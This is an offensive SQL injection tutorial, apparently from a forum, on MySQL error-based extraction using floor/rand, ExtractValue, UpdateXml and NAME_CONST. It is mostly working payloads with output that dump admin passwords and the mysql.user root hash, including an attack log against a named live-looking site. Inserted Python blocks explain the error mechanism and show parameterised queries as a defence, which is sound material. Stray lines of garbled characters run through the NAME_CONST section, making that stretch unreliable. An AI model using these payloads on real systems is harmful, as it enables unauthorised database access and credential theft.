
MySQL error-based injection: three error modes using floor, ExtractValue and UpdateXml

Posted 2015-11-11 19:03:37

1. Error via floor

Either of the following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To extract other data, replace the version() call with the subquery you need.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
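The floor payloads above work because of the order in which MySQL evaluates a GROUP BY key. As an added example that is not part of the original post, the following Python model reproduces that evaluation order so the duplicate-entry error can be understood rather than just copied. The opening rand(0) sequence 0,1,1,0,1,1 and the temp-table algorithm are assumptions taken from public descriptions of the behaviour; verify both on your own server.

```python
# Added example, not from the original post: a model of why
# "select count(*),concat(<data>,floor(rand(0)*2))x ... group by x" raises
# ERROR 1062. MySQL materialises a GROUP BY in a temporary table keyed on the
# group expression. For each source row it evaluates the key once to look it
# up; if the key is absent it evaluates the expression AGAIN while inserting
# the new group row. With the seeded rand(0) the two evaluations can differ,
# so a key that was "absent" on lookup may already exist at insert time.
#
# Assumption (verify on your own server): floor(rand(0)*2) opens with the
# values 0,1,1,0,1,1 on each fresh statement.
from typing import Dict, Iterator, Optional


class DuplicateEntry(Exception):
    """Stands in for MySQL ERROR 1062 (23000) 'Duplicate entry ... for key group_key'."""


def group_by_count(prefix: str, rand_values: Iterator[int], rows: int) -> Dict[str, int]:
    """Model of the temp-table GROUP BY.

    prefix      -- the value concatenated before floor(rand(0)*2), e.g. version()
    rand_values -- the floor(rand(0)*2) values, one per *evaluation* (not per row)
    rows        -- number of rows in the table being scanned
    Returns the per-key counts, or raises DuplicateEntry.
    """
    temp_table: Dict[str, int] = {}
    for _ in range(rows):
        key = prefix + str(next(rand_values))          # evaluation 1: lookup
        if key in temp_table:
            temp_table[key] += 1
            continue
        key_again = prefix + str(next(rand_values))    # evaluation 2: insert
        if key_again in temp_table:
            raise DuplicateEntry(f"Duplicate entry '{key_again}' for key 'group_key'")
        temp_table[key_again] = 1
    return temp_table


def leaked_value(prefix: str, rows: int = 3) -> Optional[str]:
    """Return the error text the statement would produce, or None if no error.

    Uses the assumed rand(0) opening 0,1,1,0,1,1. With it, row 1 looks up
    '<prefix>0', misses, and inserts '<prefix>1'; row 2 looks up '<prefix>1'
    and counts it; row 3 looks up '<prefix>0', misses, and tries to insert
    '<prefix>1' again, which collides. That is why the scanned table needs at
    least three rows (information_schema.tables always has them).
    """
    seq = iter([0, 1, 1, 0, 1, 1])
    try:
        group_by_count(prefix, seq, rows)
    except DuplicateEntry as e:
        return str(e)
    return None


if __name__ == "__main__":
    print(leaked_value("5.1.33-community-log"))
    # Without the disagreement between the two evaluations there is no
    # collision: a constant key sequence simply counts into one group.
    print(group_by_count("5.1.33-community-log", iter([0] * 6), 3))
```

The model also shows why the error message carries the data: the colliding key is the concatenated value itself, so whatever replaces version() in the payload is echoed verbatim by the server. Any response path that returns raw database errors to the client therefore turns a simple injection into a data-exfiltration channel.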

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
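All three error modes above reach the client only because the id value is spliced into the SQL text and the raw database error is echoed back. As an added example that is not from the original post, the following Python shows the lookup on the post's article table written the vulnerable way and the hardened way. It uses sqlite3 so it runs offline; the post's target is MySQL behind PHP, so the driver is an assumption, and what carries over is the pattern: integer check, parameter binding, and a generic error response with the detail logged server-side.

```python
# Added example, not from the original post: the same article lookup the post
# injects into, written the vulnerable way and the hardened way. sqlite3 is
# used so the example runs offline (assumption: the real target is MySQL).
import logging
import sqlite3
from typing import Optional, Tuple

logging.basicConfig(level=logging.WARNING)
log = logging.getLogger("article")


def make_db() -> sqlite3.Connection:
    """Constructed in-memory copy of the post's `article` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    conn.execute("INSERT INTO article VALUES (1, 'test', 'do it')")
    return conn


def get_article_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """String concatenation: the request value becomes SQL, and the driver's
    error text is returned to the caller, which is the channel error-based
    injection depends on."""
    sql = "SELECT * FROM article WHERE id = " + raw_id
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error as e:
        return f"ERROR: {e}"  # raw database error handed to the client


def get_article_hardened(conn: sqlite3.Connection, raw_id: str) -> Tuple[int, Optional[tuple]]:
    """Type check, bound parameter, and a generic response on database errors."""
    if not raw_id.isdigit():
        return 400, None  # anything that is not a plain integer id is rejected
    try:
        row = conn.execute("SELECT * FROM article WHERE id = ?", (int(raw_id),)).fetchone()
    except sqlite3.Error as e:
        log.warning("database error hidden from client: %s", e)  # detail stays server-side
        return 500, None  # the client sees a status code, never the error text
    return (200, row) if row else (404, None)


# Constructed sample of the ExtractValue payload quoted on this page.
PAYLOAD = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"

if __name__ == "__main__":
    db = make_db()
    print(get_article_vulnerable(db, PAYLOAD))  # leaks the driver's error text
    print(get_article_hardened(db, PAYLOAD))    # (400, None)
    print(get_article_hardened(db, "1"))        # (200, (1, 'test', 'do it'))
```

With a bound parameter the value is never parsed as SQL, so none of the functions on this page can be reached through it; the integer check is defence in depth, and hiding the error text closes the exfiltration channel even where a query does fail.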

Additional collected material:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..
+ w& W; w  i' H0 {# B$ D1 X
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
8 v" \6 E$ e" r, q6 ]# l
$ B% n; I. L1 V! ~. K
& }* E/ s+ d) v2 j% G6 e9 G
6 f7 {% i# U# ?' i
% G& i- \, p( s
" }6 E" U. R2 {. t2 U' p6 P; q
0 W5 T9 {( K0 f7 y, j
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time./ x0 F3 l7 ^& D" g$ j: L
, s+ g8 H" G. V* D. L8 p( a
Let's get the columns out of the user table..
# ]: |% s" M6 Q; o9 y* F1 c  U4 ]; W; F" \( }6 H3 W  n8 E
Code:7 r) y* F5 j) n0 z; n3 i# m; Y
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.